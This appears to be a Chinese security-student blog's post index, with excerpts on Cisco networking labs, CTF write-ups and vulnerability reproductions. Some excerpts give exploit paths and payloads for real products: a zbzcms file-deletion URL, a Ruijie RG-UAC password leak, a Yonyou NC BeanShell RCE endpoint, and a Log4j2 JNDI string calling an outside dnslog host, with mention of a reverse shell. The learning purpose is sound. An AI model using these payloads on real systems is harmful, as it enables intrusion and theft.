- 博客(158)
- 资源 (5)
- 收藏
- 关注
RSS订阅原创 zbzcms代码审计
zbzcms审计自己的一个简单记录,可能写的有点混乱,欢迎师傅们指出。环境搭建http://127.0.0.1/zbzcms/cms/cms/install/index.php直接可以自动安装好正常前台界面开始初次学习,就跟着师傅的文章一步步来,正常第一步就seay扫一遍1、任意文件删除$run传入,并没有做删除的校验判断右键全文跟踪跟到get传入,up.php 的路径就是:/cms/cms/include/up.php?run=delget请求一下路径:还是很
2022-05-27 12:41:54
1060
3
原创 windows下运行nc
windows下运行nc1、下载https://eternallybored.org/misc/netcat/可能会报毒将nc.exe复制到C:\Windows\System32 即可
2022-01-04 19:27:20
1016
原创 Cisco Packet Tracer 多区域OSPF配置实验
Cisco Packet Tracer 多区域OSPF配置实验实验内容请你列出R1-R7路由器每个端口配置的IP地址和子网掩码请用OSPF协议分区域进行路由设置全部设置成功后,终端之间能够互相Ping 通实验拓扑如下:实验步骤1、如实验拓扑图配置好主机ip、网关和路由器2、配置好终端A、B的ip、子网掩码、网关终端A:终端B:3、R1-R7各路由器每个端口的ip地址和子网掩码R1:如R1配置好所有路由器之间的ip,如192.168.3.0/30,两个端口就只
2021-12-31 03:00:00
2259
原创 Cisco Packet Tracer 单区域CIDR路由项OSPF配置实验
Cisco Packet Tracer 单区域CIDR路由项OSPF配置实验实验内容对所有路由器R1-R4的OSPF设置CIDR地址块:192.168.3.0/27对应的命令为:network 192.168.3.0 0.0.0.31 area 0对R1还应设置为192.168.1.0子网启用OSPF协议4.R4还应设置为192.168.2.0子网启用OSPF协议实验步骤如实验拓扑图配置好各个主机和路由器配置好终端A、B的主机ip和网关,并将路由器对应接口的网关设置
2021-12-31 02:45:00
1378
原创 Cisco Packet Tracer 双VTP SERVER配置实验
Cisco Packet Tracer 双VTP SERVER配置实验实验目的使用模拟仿真软件进行双VTP SERVER配置实验实验内容S2,S5为VTP SERVERS1,S3,S4,S6为VTP CLIENT终端A,C,E,G为VLAN2上的终端终端B,D,F,H为VLAN3上的终端要求VTP2域上新增一个VLAN4,交换机S4新建终端I,交换机S6新建终端J,两个新建终端I,J加入这个VLAN4,但是VTP1域不得有VLAN4终端A发送广播包,只
2021-12-23 14:26:43
3047
原创 Cisco Packet Tracer RIP协议配置实验
Cisco Packet Tracer RIP协议配置实验报告使用模拟仿真软件进行RIP协议配置实验实验内容完成实验网络拓扑图的配置让每个路由器自动生成直连路由项在各个路由器中启动RIP,让路由器生成动态路由项终端相互ping通实验步骤1、初始拓扑图如下,安装标注配置好2、添加好连接pc的网关并打开端口3、如图设置好每个路由器之间的子网4、如图配置好每个路由器的RIP5、无需设置路由器之间的下一跳,查看RIP路由6、保证每一台路由器之间都子网相连
2021-12-23 14:22:55
2880
3
原创 Cisco Packet Tracer 默认路由项配置实验
Cisco Packet Tracer 默认路由项配置实验实验目的使用模拟仿真软件进行默认路由项配置实验实验内容完成实验网络拓扑图的配置实验步骤1、初始拓扑图如下,安装标注配置好2、如图配置路由器各个端口ip地址3、如图设置各个主机的ip和网关4、配置好路由ip[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CIr5NPxr-1640240321247)(https://cdn.jsdelivr.net/gh/y2Lucky/blog-
2021-12-23 14:19:24
867
原创 Cisco Packet Tracer 超网(CIDR)设置实验
超网(CIDR)设置实验报告实验目的使用模拟仿真软件进行超网(CIDR)设置实验实验内容完成实验网络拓扑图的配置实验步骤1、初始拓扑图如下,安装标注配置好2、如pc3配置好所有主机的ip地址和网关3、如图配置好路由器网关4、配置好路由ip5、配置好下一跳R1配置路由表:R2配置路由表配置好之后ping测试一下成功ping通6、进行CIDR设置请你删除R2的两条静态路由后,增加一条聚合路由,将最左边的两个子网合并为一个超网。并给出这个超网的静态路由设置:
2021-12-23 14:17:08
2609
原创 Cisco Packet Tracer 静态路由项配置实验报告
静态路由项配置实验实验目的使用模拟仿真软件进行静态路由项配置实验实验内容完成实验网络拓扑图的配置实验步骤1、如拓扑图配置好相应设备2、如pc0配置好所有主机的ip地址和网关3、如图配置好路由器网关4、配置好路由ip5、配置好下一跳结果分析终端A成功ping通终端D达到实验目的,在路由器设置好静态路由表之后能够达到不同子网主机之间的相互ping通,实验很成功。...
2021-12-23 13:54:15
2597
5
原创 Cisco Packet Tracer 容错实验
容错实验实验目的使用模拟仿真软件进行容错实验实验内容原始网络拓扑有着冗余链路的以太网结构,为了验证生成树协议的容错性,删除任意两台交换机保持联通的物理链路,观察生成树协议通过重构生成树保证网络的连通性。验证BPDU报文内容和格式设置交换机的优先级别:s4>s2>s3>s5>s6,也就是设置s4为根桥。重构生成树后,删除阻塞端口所在的物理链路。(最后实验结果见下页ppt)实验拓扑图如下:实验步骤1、初始实验拓扑图配置完成并能够成功ping通
2021-12-23 13:49:44
1882
原创 Cisco Packet Tracer 负载均衡实验
负载均衡实验一、实验目的使用模拟仿真软件进行负载均衡实验二、实验内容由于可以基于每一个VLAN单独构建生成树,且这些生成树可以有不同的根桥和起作用的物理链路,因此,请你通过配置让每个VLAN存在冗余链路,既可以让生成树实现容错功能,又能实现负载均衡不同VLAN对应的生成树有着不同的根桥和起作用的物理链路,从而使得以太网中不存在所有生成树中都不起作用的物理链路3.为了实现负载均衡,要求不同VLAN对应的生成树中的阻塞端口不同,即某个端口如果是VLAN2的阻塞端口,那么在VLAN3中不
2021-12-23 13:41:16
2450
原创 Cisco Packet Tracer telnet跨交换机远程配置实验
telnet跨交换机远程配置实验实验内容只允许属于Vlan4的主机可以远程登录,终端C或D—假设这是网管的办公室机器,本实验要求你能在该机上telnet登录并操作三台交换机,给三台交换增加一个vlan5,并以你名字命名。实验拓扑图如下:实验步骤给每台交换机配置vlan 4下的管理地址:交换机S1的管理地址是:192.1.4.10交换机S2的管理地址是:192.1.4.20交换机S3的管理地址是:192.1.4.30如上图分别连接三台交换机进行配置通过电脑上的D
2021-12-23 13:33:59
2145
原创 Cisco Packet Tracer 子网划分实验
子网划分实验实验一 定长子网掩码实验目的使用模拟仿真软件进行定长子网掩码的子网划分实验内容假设所分配的C类地址是218.75.230.0/24,请给下图所示的各网络分配地址块,并给出需求分析和实验结果。实验步骤定长子网掩码划分需求分析子网主机IP数量路由器接口ip数量网络地址数量广播地址数量合计地址161119225111283121111541011113502114
2021-12-23 13:22:27
13474
1
原创 锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞(CNVD-2021-14536)
锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞(CNVD-2021-14536)访问并打开是如下界面/get_dkey.php?user=adminmd5解密密码后成功登陆
2021-12-15 15:41:53
2444
1
原创 用友NC的一些漏洞复现
用友NC的一些漏洞复现一、BeanShell Test Servlet命令执行漏洞介绍:用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。影响范围:NC 6.5版本复现过程:访问对应网站后界面如下:漏洞url就是:ip地址:端口/servlet/~ic/bsh.servlet.BshServlet后续还可以写shell进去,但是这里不
2021-12-15 11:22:21
11462
7
原创 Log4j2远程命令执行复现
Log4j2远程命令执行复现 Log4j2远程命令执行复现一、漏洞环境二、漏洞验证三、反弹shell一、漏洞环境环境是http://vulfocus.fofa.so平台的二、漏洞验证启动环境后访问抓包,修改请求为post在数据中的Accept:头插入exp${jndi:ldap://8hqrxz.dnslog.cn}成功回显到dnslog平台三、反弹shell使用 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 生成payload可以在这里
2021-12-12 22:49:20
3902
原创 xshell连接虚拟机中的主机
xshell连接虚拟机中的主机起因来自于屏幕窗口太多,切来切去麻烦,索性引到xshell中,方便服务器和虚拟机一起使用首先查看一下虚拟机中kali的ip修改/etc/ssh/sshd_config配置文件vim打开,去掉PasswordAuthentication yes前面的注释再新增加一行PermitRootLogin yes:wq保存并退出再启动ssh服务,并开机自启然后设置好xshell中的配置就可以连接了...
2021-12-12 17:07:59
676
原创 picgo连接github图床
在github上新建一个仓库勾选README.md用于初始化仓库,其他的默认就好生成tokengithub右上角用户图标 -> settings -> Developer settings -> Personal access tokens -> generate new token选择需要的操作然后创建,复制tokenpicgo中设置填入token,设置好仓库名设置typora这里验证上传不知道为啥可能出错,回到图片页面就上传没有问题...
2021-12-12 16:40:53
340
2
原创 pycharm报错AttributeError: ‘HTMLParser‘ ...
pycharm报错AttributeError: ‘HTMLParser’ …python3.9 报错 “AttributeError: 'HTMLParser' object has no attribute 'unescape'” 异常解决。通常是环境问题,创建工程的时候会自动创建对应项目的环境如下图,自动生成了一个项目环境的python.exe在设置里面修改为自己对应的python环境的地址后解决问题但是之前用之间就可以,不知道是不是python3.9的问题...
2021-11-30 16:05:33
2434
3
原创 Cisco Packet Tracer VLAN的配置实验
VLAN的配置实验如图配置好对应的主机ip和交换机(Switch)的连接一、创建VLAN然后分别在交换机中添加子网名称和子网id也可以命令添加创建VLAN:‒Switch(config)#vlan vlan-id命名VLAN:‒Switch(config-vlan)#name vlan-nameshow vlan brief查看配置情况二、配置Access接口把某一个端口配置为access口并和VLAN关联同处于一个VLAN2将其端口配置为access口并和VLAN关联在相应
2021-11-18 09:00:00
6030
原创 一道oj - 爱你一生一世
爱你一生一世Description题目描述在2013年1月4日,这个“爱你一生一世”的特别日子,男生都想向自己的喜欢的女生表达爱意。 你准备在该死的C语言考试后,去向她(或者他?)告白。告白怎么能缺了礼物了? 经过前期的情报收集,你了解到她喜欢的一些礼物,但是可能因为消息的不准确,其中有些 礼物并不是她喜欢。为了保险,你准备从其中挑选两件不同的礼物,请问至少有一件礼物她 会喜欢的概率。输入第一行是一个整数K,表示样例的个数。 以后每行两个整数N(2≤N≤10,000),表示礼物的个数和M(0 ≤
2021-11-17 19:43:13
219
原创 爱你一生一世
爱你一生一世Description题目描述在2013年1月4日,这个“爱你一生一世”的特别日子,男生都想向自己的喜欢的女生表达爱意。 你准备在该死的C语言考试后,去向她(或者他?)告白。告白怎么能缺了礼物了? 经过前期的情报收集,你了解到她喜欢的一些礼物,但是可能因为消息的不准确,其中有些 礼物并不是她喜欢。为了保险,你准备从其中挑选两件不同的礼物,请问至少有一件礼物她 会喜欢的概率。输入第一行是一个整数K,表示样例的个数。 以后每行两个整数N(2≤N≤10,000),表示礼物的个数和M(0 ≤
2021-11-17 18:25:15
981
原创 2021-深育杯misc - Login
Login题目简介:这破网站为什么不能注册? 题目访问ip:3001打开环境后是一个登陆窗口,但是没有账号点击下方的获取示例有提示下载下来一个提示文件后发现是个加密的压缩包明显的明文攻击,修改伪加密文件,提取出示例 - 副本.txt,添加到压缩包,然后明文攻击解得密码为qwe@123打开后发现password还是加密的,其中1.txt都是低字节6kb压缩包短文本文件的crc32碰撞https://github.com/theonlypwner/crc32拼接起来就是welc0me_
2021-11-14 09:18:34
3120
原创 BUUCTF - misc [HDCTF2019]你能发现什么蛛丝马迹吗
BUUCTF - misc [HDCTF2019]你能发现什么蛛丝马迹吗打开一个镜像文件分析镜像,看一下文件的profile值,确定内存镜像的版本volatility -f memory.img imageinfo接下来搜索一下进程,看看出题人做了些什么操作仔细看一眼时间,试试最后那个,时间最近的操作因为是win2003,查看一下这个操作从cmd命令volatility -f memory.img --profile=Win2003SP1x86 cmdscandump下来,pid是
2021-11-14 09:15:06
1143
原创 一道oj题-字母圣诞树
一道oj题-字母圣诞树字母圣诞树题目描述打印一个字母圣诞树。输入第一行是一个整数K,表示样例的个数。以后每个样例是一个大写英文字母,占一行。输出输出对应的字母圣诞树,每行末尾没有空格,每个圣诞树的最后一行前无空格。样例输入5ABCDE样例输出 AAAA A AAA BBBBBB A AAA B BBBBB CCCCCCCC A AAA B BBBBB C CCCCCCC DDDD
2021-11-12 19:08:53
1350
原创 BUUCTF - re [SUCTF2019]SignIn
BUUCTF - re [SUCTF2019]SignIn定位到关键函数题目是Signin,有三段字符,特别注意65537,RSA中经常看到。程序调用了 __gmpz_init_set_str 函数,通过搜索得知这是一个 GNU 高精度算法库,官方文档地址:https://gmplib.org/manual/经过分析:c=ad939ff59f6e70bcbfad406f2494993757eee98b91bc244184a377520d06fc35n=1034610359008169141213
2021-11-11 15:28:35
464
原创 BUUCTF - misc 刷题记录
BUUCTF -misc 刷题记录1、签到2、金三胖工具是stegsolveflag{he11ohongke}3、二维码
2021-11-10 21:33:17
1213
1
原创 BUUCTF - re [GUET-CTF2019]re —z3约束器求解题
BUUCTF - re [GUET-CTF2019]re —z3约束器求解题linux下的可执行文件,直接IDA打不开,有壳upx脱壳然后再ida分析,常规操作找到主函数然后看到if判断语句,里面的东西应该就是关键_BOOL8 __fastcall sub_4009AE(char *a1){ if ( 1629056 * *a1 != 166163712 ) return 0LL; if ( 6771600 * a1[1] != 731332800 ) retu
2021-11-10 21:20:44
1411
1
原创 BUUCTF - re [FlareOn4]login
BUUCTF - re [FlareOn4]login下载下来之后一个html,里面有一段代码<!DOCTYPE Html /><html> <head> <title>FLARE On 2017</title> </head> <body> <input type="text" name="flag" id="flag" value="Enter the
2021-11-10 21:18:47
858
原创 计算机大小端的区分
计算机大小端的区分什么是计算机的大小端?小端模式:数据的高字节存放在高地址。读取方向从高地址到低地址。大端模式:数据的高字节存放在低地址。读取方向从低地址到高地址。例如:要存放的数据:0x12345678低字节为:0x12高字节为:0x78假如是小端模式:存储方法就是: 0x12 0x34 0x56 0x78读取方式就是: 低地址 <------------ 高地址假如是大端模式: 0x78 0x56 0x34 0x12读
2021-11-08 17:59:42
301
原创 BUUCTF -re -[ACTF新生赛2020]rome
BUUCTF -re -[ACTF新生赛2020]rome无壳定位到主函数int func(){ int result; // eax int v1[4]; // [esp+14h] [ebp-44h] unsigned __int8 v2; // [esp+24h] [ebp-34h] BYREF unsigned __int8 v3; // [esp+25h] [ebp-33h] unsigned __int8 v4; // [esp+26h] [ebp-32h] un
2021-11-08 17:41:56
336
原创 BUUCTF - re - CrackRTF
BUUCTF - re - CrackRTFida分析,需要输入两次密码,估计是两段flag先看"27019e688a4e62a649fd99cadaafdb4e"是经过sub_401019()函数,跟进过去,应该是一种什么加密方式这段字符是32位,猜测md5,继续看,还有一个函数,跟进看看里面有关键信息,生成了一个dbapp.rtf文件看sub_401005函数将我们从AAA取出的值和第二次密码连接后的字符串进行异或,但是需要知道AAA中的值,使用ResourceHacker查看,取
2021-11-08 17:40:59
237
原创 BUUCTF - re - rsa
BUUCTF - re - rsahttp://tool.chacuo.net/cryptrsakeyparse 将key文件拖进去解析可以得到e=65537n=0xC0332C5C64AE47182F6C1C876D42336910545A58F7EEFEFC0BCAAF5AF341CCDD十进制就是n=86934482296048119190666062003494800588905656017203025617216654058378322103517如下网址得到p qhttp://
2021-11-08 17:38:40
192
原创 python逆序的三种方法及list()函数的简单介绍
python逆序的三种方法1、list.reverse()print("方法1-list.reverse()")list = [1,2,3,4,5,6]print("原始列表",list)list.reverse()print("变换列表",list)list2=list.reverse()print("返回值",list2)print("---------------------------")调用 list.reverse() 的返回值是 None ,它逆序的结果直接体现在原来的
2021-11-02 23:30:09
6399
原创 buuctf - re 刷题记录 1-18
buuctf - re 刷题记录 buuctf - re 刷题记录1、easyre2、reverse1持续更新1、easyreshift+f122、reverse1双击跟进str224行到25行 o替换为0,flag{hell0_w0rld},虽然很简单还是写写程序多熟练程序如下:c语言:python:持续更新...
2021-10-29 18:52:06
1173
原创 burp模拟器抓包手机app
burp模拟器抓包手机app1、下载一个安卓模拟器我这里使用的是夜神模拟器 官网:https://www.yeshen.com/安装过程很简单,不多介绍2、下载burp配置监听本机地址查看本机 IP cmd然后ipconfig然后burp设置监听,地址是172.17.108.251下拉后会直接有对应地址3、模拟器设置代理这里环境是夜神模拟器找到设置->wifi ,然后长按选中,修改网络然后填入对应的ip和端口,和burp端保持一致保存4、ca证书安装如上配置完成后
2021-10-26 12:00:24
1138
原创 【从0开始学web】151-170 文件上传
【从0开始学web】151-170 文件上传web151前台验证不可靠,将允许类型改为php然后上传一句话木马成功上传,phpinfo没找到flag,蚁剑连接,找到web152后端验证文件类型,然后连接拿flagweb153后端验证,但是这里应该是对文件后缀名进行了过滤尝试不同后缀,php3、php5、phtml等,都无法解析,然后尝试上传.htaccess,发现可以上传,写入<FilesMatch "1">SetHandler application/x-htt
2021-10-24 11:54:31
766
原创 BUUCTF—php反序列化
BUUCTF—php反序列化[极客大挑战 2019]PHP__wakeup()绕过有备份,盲猜www.zip,下载了网站源码,class.php 引用了flag.php//class.php<?phpinclude 'flag.php';error_reporting(0);class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function _
2021-10-23 00:33:08
952
1
原创 php intval() 函数
php intval() 函数<?php echo intval('1234x',0);?>输出就是:1234获取整数部分。
2021-10-21 00:21:04
126
原创 【从0开始学web】89-150 php特性
【从0开始学web】89-150 php特性前言php代码审计一直很薄弱,希望完成这部分之后能有所提升。web89 <?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-09-16 11:25:09# @Last Modified by: h1xa# @Last Modified time: 2020-09-18 15:38:51# @email: h1xa@ctfer.com# @link: https
2021-10-21 00:20:25
360
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人